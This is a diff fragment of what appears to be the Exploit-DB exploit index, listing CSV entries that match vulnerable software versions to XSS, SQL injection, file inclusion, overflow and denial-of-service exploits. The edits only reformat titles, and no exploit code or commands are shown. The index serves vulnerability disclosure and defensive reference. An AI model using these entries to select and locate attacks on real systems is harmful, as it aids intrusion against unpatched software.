2500/4600 Toolbox - Directory Traversal",2006-04-03,"Richard Horsman",windows,remote,0 27566,platforms/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos,0 27567,platforms/php/webapps/27567.txt,"ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities",2006-04-04,o.y.6,php,webapps,0 @@ -24670,14 +24665,14 @@ id,file,description,date,author,platform,type,port 27571,platforms/php/webapps/27571.txt,"SKForum 1.x - area.View.action areaID Parameter XSS",2006-04-06,r0t,php,webapps,0 27572,platforms/php/webapps/27572.txt,"SKForum 1.x - planning.View.action time Parameter XSS",2006-04-06,r0t,php,webapps,0 27573,platforms/php/webapps/27573.txt,"SKForum 1.x - user.View.action userID Parameter XSS",2006-04-06,r0t,php,webapps,0 -27574,platforms/php/webapps/27574.txt,"Basic Analysis and Security Engine 1.2.4 PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",php,webapps,0 +27574,platforms/php/webapps/27574.txt,"Basic Analysis and Security Engine 1.2.4 - PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",php,webapps,0 27575,platforms/php/webapps/27575.txt,"MD News 1 - Admin.php SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 - PNuserapi.php SQL Injection",2006-04-06,king_purba,php,webapps,0 27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5.0 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0 27578,platforms/php/webapps/27578.txt,"Jupiter CMS 1.1.5 - Index.php Cross-Site Scripting",2006-04-07,KaDaL-X,php,webapps,0 27579,platforms/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,php,webapps,0 27580,platforms/php/webapps/27580.txt,"vBulletin 3.5.1 - Vbugs.php Cross-Site Scripting",2006-04-07,r0t,php,webapps,0 -27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x JPEG and TGA Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0 +27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0 27582,platforms/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting",2006-04-07,benozor77,php,webapps,0 27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - Deptname Parameter Cross-Site Scripting",2006-04-07,r0t,cgi,webapps,0 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - Index.php Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 @@ -24734,7 +24729,7 @@ id,file,description,date,author,platform,type,port 27638,platforms/php/webapps/27638.pl,"SimpleBBS 1.0.6/1.0.7/1.1 - Remote Arbitrary Command Execution",2006-04-13,rUnViRuS,php,webapps,0 27639,platforms/multiple/dos/27639.txt,"W3C Amaya 9.4 - textarea rows Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 27640,platforms/multiple/dos/27640.txt,"W3C Amaya 9.4 - legend color Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 -27641,platforms/linux/dos/27641.txt,"Opera Web Browser 8.52 Stylesheet Attribute Buffer Overflow",2006-04-13,"SEC Consult",linux,dos,0 +27641,platforms/linux/dos/27641.txt,"Opera Web Browser 8.52 - Stylesheet Attribute Buffer Overflow",2006-04-13,"SEC Consult",linux,dos,0 27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - Print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0 27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Include",2006-04-15,rgod,php,webapps,0 27644,platforms/php/webapps/27644.txt,"PlanetSearch + - Planetsearchplus.php Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0 @@ -24746,7 +24741,7 @@ id,file,description,date,author,platform,type,port 27650,platforms/php/webapps/27650.txt,"FarsiNews 2.1/2.5 - Search.php Cross-Site Scripting",2006-04-14,"amin emami",php,webapps,0 27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 - Index.php Cross-Site Scripting",2006-04-15,Qex,php,webapps,0 27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80 -27969,platforms/multiple/dos/27969.c,"Quake 3 Engine CL_ParseDownload Remote Buffer Overflow",2006-06-05,"Luigi Auriemma",multiple,dos,0 +27969,platforms/multiple/dos/27969.c,"Quake 3 Engine - CL_ParseDownload Remote Buffer Overflow",2006-06-05,"Luigi Auriemma",multiple,dos,0 27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 - Common.php Remote File Inclusion",2006-06-05,SpC-x,php,webapps,0 27971,platforms/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 - Frameset Memory Corruption",2006-06-05,Kil13r,windows,dos,0 27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 @@ -24763,7 +24758,7 @@ id,file,description,date,author,platform,type,port 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0 27668,platforms/multiple/dos/27668.c,"Neon Responders 5.4 - Remote Clock Synchronization Denial of Service",2006-04-10,"Stefan Lochbihler",multiple,dos,0 27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 - Index.php Local File Inclusion",2006-04-17,imei,php,webapps,0 -27670,platforms/linux/dos/27670.txt,"Xine 0.9/1.0 Playlist Handling Remote Format String",2006-04-18,c0ntexb,linux,dos,0 +27670,platforms/linux/dos/27670.txt,"Xine 0.9/1.0 - Playlist Handling Remote Format String",2006-04-18,c0ntexb,linux,dos,0 27671,platforms/php/webapps/27671.txt,"LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-18,d4igoro,php,webapps,0 27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI - Cross-Site Scripting",2006-04-18,Qex,cgi,webapps,0 27673,platforms/php/webapps/27673.txt,"phpLinks 2.1.2/2.1.3 - Index.php Cross-Site Scripting",2006-04-18,r0t,php,webapps,0 @@ -24777,7 +24772,7 @@ id,file,description,date,author,platform,type,port 27681,platforms/cgi/webapps/27681.txt,"Visale 1.0 - pblsmb.cgi listno Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27682,platforms/cgi/webapps/27682.txt,"CommuniMail 1.2 - mailadmin.cgi list_id Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27683,platforms/cgi/webapps/27683.txt,"CommuniMail 1.2 - templates.cgi form_id Parameter XSS",2006-04-19,r0t,cgi,webapps,0 -27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps,0 +27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine - ArchiveApplyDisplay.JSP Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps,0 27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - addlink_lwp.cgi url Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - edit.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 - Showtopic.php SQL Injection",2006-04-19,Qex,php,webapps,0 @@ -24792,7 +24787,7 @@ id,file,description,date,author,platform,type,port 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi username Parameter XSS",2006-04-20,r0t,cgi,webapps,0 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi password Parameter XSS",2006-04-20,r0t,cgi,webapps,0 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 -28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption",2013-09-03,kingcope,hardware,remote,0 +28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Auth Heap Corruption",2013-09-03,kingcope,hardware,remote,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injection",2006-06-17,Liz0ziM,php,webapps,0 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - Index.php Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 @@ -24827,14 +24822,14 @@ id,file,description,date,author,platform,type,port 27721,platforms/php/webapps/27721.txt,"phpldapadmin 0.9.8 - search.php scope Parameter XSS",2006-04-21,r0t,php,webapps,0 27722,platforms/php/webapps/27722.txt,"phpldapadmin 0.9.8 - template_engine.php Multiple Parameter XSS",2006-04-21,r0t,php,webapps,0 27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service",2006-04-21,"Tanaka Akira",linux,dos,0 -27724,platforms/php/webapps/27724.txt,"Scry Gallery Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps,0 +27724,platforms/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps,0 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 27730,platforms/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 - LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",multiple,dos,0 27731,platforms/php/webapps/27731.txt,"photokorn 1.53/1.54 - index.php Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27732,platforms/php/webapps/27732.txt,"photokorn 1.53/1.54 - postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27733,platforms/php/webapps/27733.txt,"photokorn 1.53/1.54 - print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 +27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0 27736,platforms/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 - Index.php CK Parameter SQL Injection",2006-05-25,IceShaman,php,webapps,0 27737,platforms/php/webapps/27737.txt,"Instant Photo Gallery 1.0 - member.php member Parameter XSS",2006-04-25,Qex,php,webapps,0 @@ -24872,12 +24867,12 @@ id,file,description,date,author,platform,type,port 27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod - Weblog_posting.php SQL Injection",2006-04-29,Qex,php,webapps,0 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 27855,platforms/php/webapps/27855.txt,"Vizra - A_Login.php Cross-Site Scripting",2006-05-11,R00TT3R,php,webapps,0 -27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0 +27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0 27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0 -27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",2013-08-22,Metasploit,linux,webapps,443 +27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) - users/create Mass Assignment",2013-08-22,Metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow",2013-08-22,x90c,linux,dos,139 27779,platforms/php/webapps/27779.txt,"Advanced GuestBook 2.x - Addentry.php Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 @@ -24922,7 +24917,7 @@ id,file,description,date,author,platform,type,port 27819,platforms/php/webapps/27819.txt,"CuteNews 1.4.1 - search.php Multiple Parameter XSS",2006-05-05,NST,php,webapps,0 27820,platforms/windows/remote/27820.txt,"Cryptomathic - ActiveX Control Remote Buffer Overflow",2006-05-05,"Dennis Rand",windows,remote,0 27821,platforms/php/webapps/27821.html,"OpenFAQ 0.4 - Validate.php HTML Injection",2006-05-06,"Kamil Sienicki",php,webapps,0 -27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps,0 +27822,platforms/php/webapps/27822.txt,"MyBloggie 2.1.2/2.1.3 - BBCode IMG Tag HTML Injection",2006-05-06,zerogue,php,webapps,0 27823,platforms/php/webapps/27823.txt,"OpenEngine 1.7/1.8 Template Unauthorized Access",2006-05-08,ck@caroli.info,php,webapps,0 27824,platforms/php/webapps/27824.txt,"Singapore 0.9.7 - Index.php Cross-Site Scripting",2006-05-08,alp_eren@ayyildiz.org,php,webapps,0 27825,platforms/asp/webapps/27825.txt,"Ocean12 Technologies Calendar Manager Pro 1.0 1 - admin/main.asp date Parameter SQL Injection",2006-05-08,dj_eyes2005,asp,webapps,0 @@ -24952,11 +24947,11 @@ id,file,description,date,author,platform,type,port 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.ASP SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library Heap Corruption",2006-05-09,"Ruben Santamarta ",windows,dos,0 27851,platforms/windows/remote/27851.bat,"Microsoft Windows - Path Conversion Weakness",2006-05-10,"Mario Ballano Bárcena",windows,remote,0 -27852,platforms/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security HTTP Proxy Internal IP Leakage Weakness",2006-05-10,"Bernhard Mueller",multiple,remote,0 +27852,platforms/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage Weakness",2006-05-10,"Bernhard Mueller",multiple,remote,0 27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter XSS",2006-05-11,sn4k3.23,php,webapps,0 -27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 Vname Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 +27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - Vname Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 - Chat.php Cross-Site Scripting",2006-05-12,Mr-X,php,webapps,0 27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/Navigation.asp sDeviceView Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/ToolResults.asp sHostname Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 @@ -24984,8 +24979,8 @@ id,file,description,date,author,platform,type,port 27884,platforms/php/webapps/27884.txt,"Confixx 3.0/3.1 - Index.php Cross-Site Scripting",2006-05-15,LoK-Crew,php,webapps,0 27885,platforms/php/webapps/27885.txt,"PHPRemoteView - PRV.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 27886,platforms/php/webapps/27886.txt,"Sphider 1.3 - Search.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-16,Soot,php,webapps,0 -27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0 -27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps,0 +27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0 +27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure",2006-05-16,"Joseph Pierini",java,webapps,0 27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 - Admin.php Cross-Site Scripting",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting",2006-05-17,LiNuX_rOOt,asp,webapps,0 27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0 @@ -24998,9 +24993,9 @@ id,file,description,date,author,platform,type,port 27898,platforms/asp/webapps/27898.txt,"CodeAvalanche News 1.2 - Default.ASP SQL Injection",2006-05-19,omnipresent,asp,webapps,0 27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 - DC.php SQL Injection",2006-05-19,Luny,php,webapps,0 27900,platforms/php/webapps/27900.txt,"Artmedic Newsletter 4.1 - Log.php Remote Script Execution",2006-05-19,C.Schmitz,php,webapps,0 -27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",multiple,dos,0 +27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 - Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",multiple,dos,0 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution",2006-05-22,"RedTeam Pentesting",linux,remote,0 -27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x Filename Remote Format String",2006-05-23,KaDaL-X,linux,dos,0 +27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,linux,dos,0 27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x / DoceboKms 3.0.3 / Docebo CMS 3.0.x - Multiple Remote File Inclusion",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x - Lang Parameter Multiple Remote File Inclusion",2006-05-26,beford,php,webapps,0 27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",windows,dos,0 @@ -25045,7 +25040,7 @@ id,file,description,date,author,platform,type,port 27943,platforms/windows/remote/27943.txt,"Oracle Java - ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 27944,platforms/osx/local/27944.rb,"Mac OS X - Sudo Password Bypass",2013-08-29,Metasploit,osx,local,0 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0 -27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 +27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x - Redirect.php Local File Inclusion",2006-06-02,brokejunker,php,webapps,0 27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 @@ -25081,7 +25076,7 @@ id,file,description,date,author,platform,type,port 27998,platforms/php/webapps/27998.txt,"Open Business Management 1.0.3 pl1 - company_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 27999,platforms/php/webapps/27999.txt,"Baby Katie Media VSReal and VScal 1.0 - index.php lid Parameter XSS",2006-06-09,Luny,php,webapps,0 28000,platforms/php/webapps/28000.txt,"Baby Katie Media VSReal and VScal 1.0 - myslideshow.php title Parameter XSS",2006-06-09,Luny,php,webapps,0 -28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver Local Denial of Service",2006-06-13,"Ruben Santamarta ",windows,dos,0 +28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta ",windows,dos,0 28002,platforms/asp/webapps/28002.txt,"KAPhotoservice 7.5 - album.asp cat Parameter XSS",2006-06-09,r0t,asp,webapps,0 28003,platforms/asp/webapps/28003.txt,"KAPhotoservice 7.5 - albums.asp albumid Parameter XSS",2006-06-09,r0t,asp,webapps,0 28004,platforms/asp/webapps/28004.txt,"KAPhotoservice 7.5 - edtalbum.asp Multiple Parameter XSS",2006-06-09,r0t,asp,webapps,0 @@ -25141,7 +25136,7 @@ id,file,description,date,author,platform,type,port 28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 28076,platforms/php/webapps/28076.txt,"Vbulletin 3.0.9/3.5.x - Member.php Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28077,platforms/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x - Parse_User_ID Remote Buffer Overflow",2006-06-20,"Evgeny Legerov",linux,dos,0 -28078,platforms/php/webapps/28078.txt,"e107 0.7.5 Subject field HTML Injection",2006-06-21,"EllipSiS Security",php,webapps,0 +28078,platforms/php/webapps/28078.txt,"e107 0.7.5 - Subject field HTML Injection",2006-06-21,"EllipSiS Security",php,webapps,0 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) Crash PoC",2013-09-04,ariarat,windows,dos,0 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 - (.wav) Crash PoC",2013-09-04,ariarat,windows,dos,0 @@ -25175,7 +25170,7 @@ id,file,description,date,author,platform,type,port 28110,platforms/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting",2006-06-26,r0t,php,webapps,0 28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 - header.php title Parameter XSS",2006-06-26,simo64,php,webapps,0 28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 - view.php offset Parameter SQL Injection",2006-06-26,simo64,php,webapps,0 -28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps,0 +28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 - OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps,0 28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 - Admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 @@ -25187,7 +25182,7 @@ id,file,description,date,author,platform,type,port 28122,platforms/php/webapps/28122.txt,"vCard PRO - search.php event_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28123,platforms/php/webapps/28123.txt,"Pre Shopping Mall 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - Index.php Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 -28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 +28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - (video.php value param) SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Auth Bypass SQL Injection",2013-09-06,shiZheni,php,webapps,0 28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL",2013-09-06,Metasploit,windows,local,0 @@ -25223,7 +25218,7 @@ id,file,description,date,author,platform,type,port 28160,platforms/linux/dos/28160.txt,"Gentoo-Specific MPG123 - URI Remote Buffer Overflow",2006-07-03,"Horst Schirmeier",linux,dos,0 28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x - Comments.php Cross-Site Scripting",2006-07-04,iss4m,php,webapps,0 28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 - Index.php Remote File Inclusion",2006-07-04,black-code,php,webapps,0 -28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 +28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 28164,platforms/windows/dos/28164.html,"Microsoft Internet Explorer 6.0 - Href Title Denial of Service",2006-07-04,jsz,windows,dos,0 28165,platforms/osx/dos/28165.html,"Apple Safari Web Browser 2.0.4 - DHTML SetAttributeNode() Null Dereference Denial of Service",2006-07-05,"Dennis Cox",osx,dos,0 28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 - Index.php Date Parameter SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0 @@ -25245,7 +25240,7 @@ id,file,description,date,author,platform,type,port 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Stored XSS",2013-09-10,loneferret,windows,remote,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - (search.php cat_id param) SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 -28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 +28186,platforms/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055)",2013-09-10,Metasploit,windows,remote,0 28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (2)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 @@ -25264,7 +25259,7 @@ id,file,description,date,author,platform,type,port 28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6.0 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0 28203,platforms/asp/webapps/28203.txt,"Hosting Controller 1.x - Error.ASP Cross-Site Scripting",2006-07-11,Dea7h,asp,webapps,0 28204,platforms/php/webapps/28204.txt,"SaPHPLesson 2.0 - Add.php SQL Injection",2006-07-11,C.B.B.L,php,webapps,0 -28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0 +28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0 28206,platforms/php/webapps/28206.txt,"Fantastic GuestBook 2.0.1 - GuestBook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6.0 